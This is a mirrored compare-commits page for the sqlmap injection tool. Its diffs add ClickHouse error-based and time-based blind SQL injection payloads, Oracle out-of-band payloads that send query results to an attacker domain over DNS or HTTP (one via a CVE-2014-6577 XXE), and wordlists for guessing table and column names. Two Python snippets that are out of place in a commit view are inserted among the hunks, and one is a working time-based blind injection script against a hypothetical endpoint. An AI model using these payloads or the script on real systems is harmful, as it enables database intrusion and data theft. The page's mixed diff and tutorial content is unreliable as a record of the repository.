Mirror of https://github.com/sqlmapproject/sqlmap.git (synced 2025-12-06 20:51:31 +00:00)
Compare commits
60 Commits
| SHA1 |
|---|
| bb48dd037f |
| df388b2150 |
| 66cc6ae55c |
| 322d80c0cf |
| 1230e57fca |
| ee15749ac4 |
| 8466a89ed3 |
| acc7b16845 |
| 48c967c01d |
| d28a66a340 |
| 30b43eccab |
| 290a8e7119 |
| cf5e2aa7ef |
| 8bc2ace094 |
| e1043173d7 |
| 12c472cef5 |
| 037a07ddde |
| 0e8940b0be |
| 3ad6727d0c |
| 4191b06f58 |
| 60bb973c11 |
| 0fba9b13b3 |
| 17688f6711 |
| 3b3c2a5d04 |
| 4f7614412f |
| 4efb3ea840 |
| c2bac51c4f |
| 7d763e224a |
| 4dd362cb2c |
| 077d58c5e9 |
| 257c4d1c88 |
| ce30fa08d6 |
| 3ca2533c39 |
| 75bfebed9d |
| 3117730d84 |
| 323af987ed |
| 80dc67f85a |
| ca2f094e4a |
| 3aa6692b82 |
| aabfcbc3e1 |
| d42174e8a0 |
| a1bf89d31e |
| 99ea44c7b3 |
| abc092959f |
| d5547d908c |
| 25fe5dce21 |
| 1f82d9587a |
| 15d9c8f9ed |
| 01310a47fd |
| 56177c3d2a |
| c5d7c542a2 |
| 4357b0087d |
| d3bfe59401 |
| 9eb970e7c7 |
| 46495f70f8 |
| 30ba167cc1 |
| d7180d38c4 |
| b1aaac5ba2 |
| 8962e152ac |
| c58383e684 |
.github/ISSUE_TEMPLATE/bug_report.md (vendored, 8 changes)

@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
If applicable, add screenshots to help explain your problem.

**Running environment:**
- sqlmap version [e.g. 1.3.5.93#dev]
- Installation method [e.g. git]
- Operating system: [e.g. Microsoft Windows 10]
- Python version [e.g. 3.5.2]
- sqlmap version [e.g. 1.7.2.12#dev]
- Installation method [e.g. pip]
- Operating system: [e.g. Microsoft Windows 11]
- Python version [e.g. 3.11.2]

**Target details:**
- DBMS [e.g. Microsoft SQL Server]
.github/workflows/tests.yml (vendored, 2 changes)

@@ -10,7 +10,7 @@ jobs:
strategy:
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
python-version: [ '2.x', '3.11', 'pypy-2.7', 'pypy-3.7' ]
python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
steps:
- uses: actions/checkout@v2
- name: Set up Python
@@ -69,7 +69,8 @@ Translations
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
@@ -1,2 +1,3 @@
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual
8 binary files not shown.
@@ -1844,6 +1844,10 @@ banner_id
error
language_id
val
parol
familiya
imya
otchestvo

# site:jp

@@ -2731,6 +2735,34 @@ ssn
account
confidential

# site:nl

naam
straat
gemeente
beschrijving
id_gebruiker
gebruiker_id
gebruikersnaam
wachtwoord
telefoon
voornaam
achternaam
geslacht
huisnummer
gemeente
leeftijd

# site:cn

yonghuming
mima
xingming
xingbie
touxiang
youxiang
shouji

# Misc

u_pass
@@ -399,6 +399,7 @@ XDBWEBSERVICES

# MySQL
information_schema
performance_schema
mysql
phpmyadmin

@@ -3578,3 +3578,11 @@ users
user_usergroup_map
viewlevels
weblinks

# site:nl

gebruikers

# site:cn

yonghu
@@ -452,6 +452,763 @@ WRITEXOR
YEAR_MONTH
ZEROFILL

# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)

ACCESSIBLE ACCOUNT ACTION ACTIVE ADD ADMIN AFTER AGAINST
AGGREGATE ALGORITHM ALL ALTER ALWAYS ANALYSE ANALYZE AND
ANY ARRAY AS ASC ASCII ASENSITIVE AT ATTRIBUTE
AUTHENTICATION AUTOEXTEND_SIZE AUTO_INCREMENT AVG AVG_ROW_LENGTH BACKUP BEFORE BEGIN
BETWEEN BIGINT BINARY BINLOG BIT BLOB BLOCK BOOL
BOOLEAN BOTH BTREE BUCKETS BULK BY BYTE CACHE
CALL CASCADE CASCADED CASE CATALOG_NAME CHAIN CHALLENGE_RESPONSE CHANGE
CHANGED CHANNEL CHAR CHARACTER CHARSET CHECK CHECKSUM CIPHER
CLASS_ORIGIN CLIENT CLONE CLOSE COALESCE CODE COLLATE COLLATION
COLUMN COLUMNS COLUMN_FORMAT COLUMN_NAME COMMENT COMMIT COMMITTED COMPACT
COMPLETION COMPONENT COMPRESSED COMPRESSION CONCURRENT CONDITION CONNECTION CONSISTENT
CONSTRAINT CONSTRAINT_CATALOG CONSTRAINT_NAME CONSTRAINT_SCHEMA CONTAINS CONTEXT CONTINUE CONVERT
CPU CREATE CROSS CUBE CUME_DIST CURRENT CURRENT_DATE CURRENT_TIME
CURRENT_TIMESTAMP CURRENT_USER CURSOR CURSOR_NAME DATA DATABASE DATABASES DATAFILE
DATE DATETIME DAY DAY_HOUR DAY_MICROSECOND DAY_MINUTE DAY_SECOND DEALLOCATE
DEC DECIMAL DECLARE DEFAULT DEFAULT_AUTH DEFINER DEFINITION DELAYED
DELAY_KEY_WRITE DELETE DENSE_RANK DESC DESCRIBE DESCRIPTION DES_KEY_FILE DETERMINISTIC
DIAGNOSTICS DIRECTORY DISABLE DISCARD DISK DISTINCT DISTINCTROW DIV
DO DOUBLE DROP DUAL DUMPFILE DUPLICATE DYNAMIC EACH
ELSE ELSEIF EMPTY ENABLE ENCLOSED ENCRYPTION END ENDS
ENFORCED ENGINE ENGINES ENGINE_ATTRIBUTE ENUM ERROR ERRORS ESCAPE
ESCAPED EVENT EVENTS EVERY EXCEPT EXCHANGE EXCLUDE EXECUTE
EXISTS EXIT EXPANSION EXPIRE EXPLAIN EXPORT EXTENDED EXTENT_SIZE
FACTOR FAILED_LOGIN_ATTEMPTS FALSE FAST FAULTS FETCH FIELDS FILE
FILE_BLOCK_SIZE FILTER FINISH FIRST FIRST_VALUE FIXED FLOAT FLOAT4
FLOAT8 FLUSH FOLLOWING FOLLOWS FOR FORCE FOREIGN FORMAT
FOUND FROM FULL FULLTEXT FUNCTION GENERAL GENERATE GENERATED
GEOMCOLLECTION GEOMETRY GEOMETRYCOLLECTION GET GET_FORMAT GET_MASTER_PUBLIC_KEY GET_SOURCE_PUBLIC_KEY GLOBAL
GRANT GRANTS GROUP GROUPING GROUPS GROUP_REPLICATION GTID_ONLY HANDLER
HASH HAVING HELP HIGH_PRIORITY HISTOGRAM HISTORY HOST HOSTS
HOUR HOUR_MICROSECOND HOUR_MINUTE HOUR_SECOND IDENTIFIED IF IGNORE IGNORE_SERVER_IDS
IMPORT IN INACTIVE INDEX INDEXES INFILE INITIAL INITIAL_SIZE
INITIATE INNER INOUT INSENSITIVE INSERT INSERT_METHOD INSTALL INSTANCE
INT INT1 INT2 INT3 INT4 INT8 INTEGER INTERSECT
INTERVAL INTO INVISIBLE INVOKER IO IO_AFTER_GTIDS IO_BEFORE_GTIDS IO_THREAD
IPC IS ISOLATION ISSUER ITERATE JOIN JSON JSON_TABLE
JSON_VALUE KEY KEYRING KEYS KEY_BLOCK_SIZE KILL LAG LANGUAGE
LAST LAST_VALUE LATERAL LEAD LEADING LEAVE LEAVES LEFT
LESS LEVEL LIKE LIMIT LINEAR LINES LINESTRING LIST
LOAD LOCAL LOCALTIME LOCALTIMESTAMP LOCK LOCKED LOCKS LOGFILE
LOGS LONG LONGBLOB LONGTEXT LOOP LOW_PRIORITY MASTER MASTER_AUTO_POSITION
MASTER_BIND MASTER_COMPRESSION_ALGORITHMS MASTER_CONNECT_RETRY MASTER_DELAY MASTER_HEARTBEAT_PERIOD MASTER_HOST MASTER_LOG_FILE MASTER_LOG_POS
MASTER_PASSWORD MASTER_PORT MASTER_PUBLIC_KEY_PATH MASTER_RETRY_COUNT MASTER_SERVER_ID MASTER_SSL MASTER_SSL_CA MASTER_SSL_CAPATH
MASTER_SSL_CERT MASTER_SSL_CIPHER MASTER_SSL_CRL MASTER_SSL_CRLPATH MASTER_SSL_KEY MASTER_SSL_VERIFY_SERVER_CERT MASTER_TLS_CIPHERSUITES MASTER_TLS_VERSION
MASTER_USER MASTER_ZSTD_COMPRESSION_LEVEL MATCH MAXVALUE MAX_CONNECTIONS_PER_HOUR MAX_QUERIES_PER_HOUR MAX_ROWS MAX_SIZE
MAX_UPDATES_PER_HOUR MAX_USER_CONNECTIONS MEDIUM MEDIUMBLOB MEDIUMINT MEDIUMTEXT MEMBER MEMORY
MERGE MESSAGE_TEXT MICROSECOND MIDDLEINT MIGRATE MINUTE MINUTE_MICROSECOND MINUTE_SECOND
MIN_ROWS MOD MODE MODIFIES MODIFY MONTH MULTILINESTRING MULTIPOINT
MULTIPOLYGON MUTEX MYSQL_ERRNO NAME NAMES NATIONAL NATURAL NCHAR
NDB NDBCLUSTER NESTED NETWORK_NAMESPACE NEVER NEW NEXT NO
NODEGROUP NONE NOT NOWAIT NO_WAIT NO_WRITE_TO_BINLOG NTH_VALUE NTILE
NULL NULLS NUMBER NUMERIC NVARCHAR OF OFF OFFSET
OJ OLD ON ONE ONLY OPEN OPTIMIZE OPTIMIZER_COSTS
OPTION OPTIONAL OPTIONALLY OPTIONS OR ORDER ORDINALITY ORGANIZATION
OTHERS OUT OUTER OUTFILE OVER OWNER PACK_KEYS PAGE
PARSER PARTIAL PARTITION PARTITIONING PARTITIONS PASSWORD PASSWORD_LOCK_TIME PATH
PERCENT_RANK PERSIST PERSIST_ONLY PHASE PLUGIN PLUGINS PLUGIN_DIR POINT
POLYGON PORT PRECEDES PRECEDING PRECISION PREPARE PRESERVE PREV
PRIMARY PRIVILEGES PRIVILEGE_CHECKS_USER PROCEDURE PROCESS PROCESSLIST PROFILE PROFILES
PROXY PURGE QUARTER QUERY QUICK RANDOM RANGE RANK
READ READS READ_ONLY READ_WRITE REAL REBUILD RECOVER RECURSIVE
REDOFILE REDO_BUFFER_SIZE REDUNDANT REFERENCE REFERENCES REGEXP REGISTRATION RELAY
RELAYLOG RELAY_LOG_FILE RELAY_LOG_POS RELAY_THREAD RELEASE RELOAD REMOTE REMOVE
RENAME REORGANIZE REPAIR REPEAT REPEATABLE REPLACE REPLICA REPLICAS
REPLICATE_DO_DB REPLICATE_DO_TABLE REPLICATE_IGNORE_DB REPLICATE_IGNORE_TABLE REPLICATE_REWRITE_DB REPLICATE_WILD_DO_TABLE REPLICATE_WILD_IGNORE_TABLE REPLICATION
REQUIRE REQUIRE_ROW_FORMAT RESET RESIGNAL RESOURCE RESPECT RESTART RESTORE
RESTRICT RESUME RETAIN RETURN RETURNED_SQLSTATE RETURNING RETURNS REUSE
REVERSE REVOKE RIGHT RLIKE ROLE ROLLBACK ROLLUP ROTATE
ROUTINE ROW ROWS ROW_COUNT ROW_FORMAT ROW_NUMBER RTREE SAVEPOINT
SCHEDULE SCHEMA SCHEMAS SCHEMA_NAME SECOND SECONDARY SECONDARY_ENGINE SECONDARY_ENGINE_ATTRIBUTE
SECONDARY_LOAD SECONDARY_UNLOAD SECOND_MICROSECOND SECURITY SELECT SENSITIVE SEPARATOR SERIAL
SERIALIZABLE SERVER SESSION SET SHARE SHOW SHUTDOWN SIGNAL
SIGNED SIMPLE SKIP SLAVE SLOW SMALLINT SNAPSHOT SOCKET
SOME SONAME SOUNDS SOURCE SOURCE_AUTO_POSITION SOURCE_BIND SOURCE_COMPRESSION_ALGORITHMS SOURCE_CONNECT_RETRY
SOURCE_DELAY SOURCE_HEARTBEAT_PERIOD SOURCE_HOST SOURCE_LOG_FILE SOURCE_LOG_POS SOURCE_PASSWORD SOURCE_PORT SOURCE_PUBLIC_KEY_PATH
SOURCE_RETRY_COUNT SOURCE_SSL SOURCE_SSL_CA SOURCE_SSL_CAPATH SOURCE_SSL_CERT SOURCE_SSL_CIPHER SOURCE_SSL_CRL SOURCE_SSL_CRLPATH
SOURCE_SSL_KEY SOURCE_SSL_VERIFY_SERVER_CERT SOURCE_TLS_CIPHERSUITES SOURCE_TLS_VERSION SOURCE_USER SOURCE_ZSTD_COMPRESSION_LEVEL SPATIAL SPECIFIC
SQL SQLEXCEPTION SQLSTATE SQLWARNING SQL_AFTER_GTIDS SQL_AFTER_MTS_GAPS SQL_BEFORE_GTIDS SQL_BIG_RESULT
SQL_BUFFER_RESULT SQL_CACHE SQL_CALC_FOUND_ROWS SQL_NO_CACHE SQL_SMALL_RESULT SQL_THREAD SQL_TSI_DAY SQL_TSI_HOUR
SQL_TSI_MINUTE SQL_TSI_MONTH SQL_TSI_QUARTER SQL_TSI_SECOND SQL_TSI_WEEK SQL_TSI_YEAR SRID SSL
STACKED START STARTING STARTS STATS_AUTO_RECALC STATS_PERSISTENT STATS_SAMPLE_PAGES STATUS
STOP STORAGE STORED STRAIGHT_JOIN STREAM STRING SUBCLASS_ORIGIN SUBJECT
SUBPARTITION SUBPARTITIONS SUPER SUSPEND SWAPS SWITCHES SYSTEM TABLE
TABLES TABLESPACE TABLE_CHECKSUM TABLE_NAME TEMPORARY TEMPTABLE TERMINATED TEXT
THAN THEN THREAD_PRIORITY TIES TIME TIMESTAMP TIMESTAMPADD TIMESTAMPDIFF
TINYBLOB TINYINT TINYTEXT TLS TO TRAILING TRANSACTION TRIGGER
TRIGGERS TRUE TRUNCATE TYPE TYPES UNBOUNDED UNCOMMITTED UNDEFINED
UNDO UNDOFILE UNDO_BUFFER_SIZE UNICODE UNINSTALL UNION UNIQUE UNKNOWN
UNLOCK UNREGISTER UNSIGNED UNTIL UPDATE UPGRADE URL USAGE
USE USER USER_RESOURCES USE_FRM USING UTC_DATE UTC_TIME UTC_TIMESTAMP
VALIDATION VALUE VALUES VARBINARY VARCHAR VARCHARACTER VARIABLES VARYING
VCPU VIEW VIRTUAL VISIBLE WAIT WARNINGS WEEK WEIGHT_STRING
WHEN WHERE WHILE WINDOW WITH WITHOUT WORK WRAPPER
WRITE X509 XA XID XML XOR YEAR YEAR_MONTH
ZEROFILL ZONE

# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)

ABS

@@ -872,3 +1629,8 @@ XMLTABLE
XMLTEXT
XMLVALIDATE
YEAR

# Misc

ORD
MID
33 binary files not shown.
@@ -211,6 +211,11 @@
    <error regexp="Syntax error,[^\n]+assumed to mean"/>
</dbms>

<dbms value="ClickHouse">
    <error regexp="Code: \d+. DB::Exception:"/>
    <error regexp="Syntax error: failed at position \d+"/>
</dbms>

<dbms value="CrateDB">
    <error regexp="io\.crate\.client\.jdbc"/>
</dbms>
@@ -838,7 +838,7 @@
    <title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
    <stype>2</stype>
    <level>4</level>
    <risk>1</risk>
    <risk>3</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>

@@ -853,6 +853,44 @@
    </details>
</test>

<test>
    <title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
    <stype>2</stype>
    <level>3</level>
    <risk>1</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
    <request>
        <payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>ClickHouse</dbms>
    </details>
</test>

<test>
    <title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
    <stype>2</stype>
    <level>4</level>
    <risk>3</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
    <request>
        <payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>ClickHouse</dbms>
    </details>
</test>

<!--
    TODO: if possible, add payload for SQLite, Microsoft Access,
    and SAP MaxDB - no known techniques at this time
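A minimal sketch of how the `<grep>` expression in the ClickHouse error-based tests above is used: the injected query wraps its output between two delimiter strings, and the result is pulled back out of the DBMS error text with a regex. The delimiter values and the sample error message here are made up for illustration; in practice sqlmap substitutes its own random markers for [DELIMITER_START] and [DELIMITER_STOP].

```python
import re

# hypothetical delimiter values standing in for [DELIMITER_START]/[DELIMITER_STOP]
DELIMITER_START, DELIMITER_STOP = "qxjzq", "qkvvq"
grep = "%s(?P<result>.*?)%s" % (DELIMITER_START, DELIMITER_STOP)

# e.g. a DB::Exception message echoed back by the vulnerable application
error_page = "Code: 6. DB::Exception: Cannot parse string 'qxjzqdefaultqkvvq' as UInt8"

match = re.search(grep, error_page)
print(match.group("result"))  # default
```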
@@ -133,5 +133,25 @@
        <dbms>Firebird</dbms>
    </details>
</test>

<test>
    <title>ClickHouse inline queries</title>
    <stype>3</stype>
    <level>3</level>
    <risk>1</risk>
    <clause>1,2,3,8</clause>
    <where>3</where>
    <vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
    <request>
        <payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>ClickHouse</dbms>
    </details>
</test>

<!-- End of inline queries tests -->
</root>
@@ -195,9 +195,9 @@
    <risk>2</risk>
    <clause>1,2,3,8,9</clause>
    <where>1</where>
    <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
    <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
    <request>
        <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
        <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
    </request>
    <response>
        <time>[DELAYED]</time>

@@ -235,9 +235,9 @@
    <risk>3</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
    <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
    <request>
        <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
        <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
    </request>
    <response>
        <time>[DELAYED]</time>

@@ -276,9 +276,9 @@
    <risk>2</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
    <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
    <request>
        <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
        <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
        <comment>#</comment>
    </request>
    <response>

@@ -318,9 +318,9 @@
    <risk>3</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
    <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
    <request>
        <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
        <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
        <comment>#</comment>
    </request>
    <response>

@@ -1494,6 +1494,44 @@
    </details>
</test>

<test>
    <title>ClickHouse AND time-based blind (heavy query)</title>
    <stype>5</stype>
    <level>4</level>
    <risk>1</risk>
    <clause>1,2,3</clause>
    <where>1</where>
    <vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
    <request>
        <payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
    </request>
    <response>
        <time>[DELAYED]</time>
    </response>
    <details>
        <dbms>ClickHouse</dbms>
    </details>
</test>

<test>
    <title>ClickHouse OR time-based blind (heavy query)</title>
    <stype>5</stype>
    <level>5</level>
    <risk>3</risk>
    <clause>1,2,3</clause>
    <where>1</where>
    <vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
    <request>
        <payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
    </request>
    <response>
        <time>[DELAYED]</time>
    </response>
    <details>
        <dbms>ClickHouse</dbms>
    </details>
</test>

<!-- End of time-based boolean tests -->

<!-- Time-based boolean tests - Numerous clauses -->

@@ -1607,10 +1645,10 @@
    <level>5</level>
    <risk>2</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
    <where>3</where>
    <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
    <request>
        <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
        <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
    </request>
    <response>
        <time>[DELAYED]</time>

@@ -1880,7 +1918,7 @@
    <level>4</level>
    <risk>2</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <where>3</where>
    <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
    <request>
        <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>

@@ -1900,7 +1938,7 @@
    <level>5</level>
    <risk>2</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <where>3</where>
    <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
    <request>
        <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
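A hedged sketch of the idea behind the ClickHouse heavy-query tests above: numbers(if((condition), 1000000, 1)) iterates a million rows only when the inferred condition is true, so the response time itself answers the question. The target URL, parameter name, delay threshold and the use of the requests package are all assumptions for illustration; this is not how sqlmap itself issues the requests.

```python
import time
import requests

TARGET = "http://192.168.56.101/vuln.php"  # hypothetical boolean/time-blind endpoint

def appears_true(condition, threshold=2.0):
    # heavy-query payload modeled on the <vector> above; fuzzBits() forces real work per row
    payload = ("1 AND 7747=(SELECT COUNT(fuzzBits('abcd', 0.001)) "
               "FROM numbers(if((%s), 1000000, 1)))" % condition)
    start = time.time()
    requests.get(TARGET, params={"id": payload}, timeout=30)
    return (time.time() - start) > threshold  # crude delay check

print(appears_true("length(currentDatabase())>3"))
```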
@@ -938,8 +938,8 @@
    <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
    <isnull query="COALESCE(%s,' ')"/>
    <delimiter query="||"/>
    <limit query="{LIMIT %d OFFSET %d}"/>
    <limitregexp query="{LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)}"/>
    <limit query="OFFSET %d ROWS FETCH FIRST %d ROWS ONLY"/>
    <limitregexp query="OFFSET\s+([\d]+)\s+ROWS\s+FETCH\s+FIRST\s+([\d]+)\s+ROWS\s+ONLY"/>
    <limitgroupstart query="2"/>
    <limitgroupstop query="1"/>
    <limitstring/>

@@ -962,11 +962,11 @@
    <is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
    <dbs>
        <inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
        <blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
        <blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
    </dbs>
    <tables>
        <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
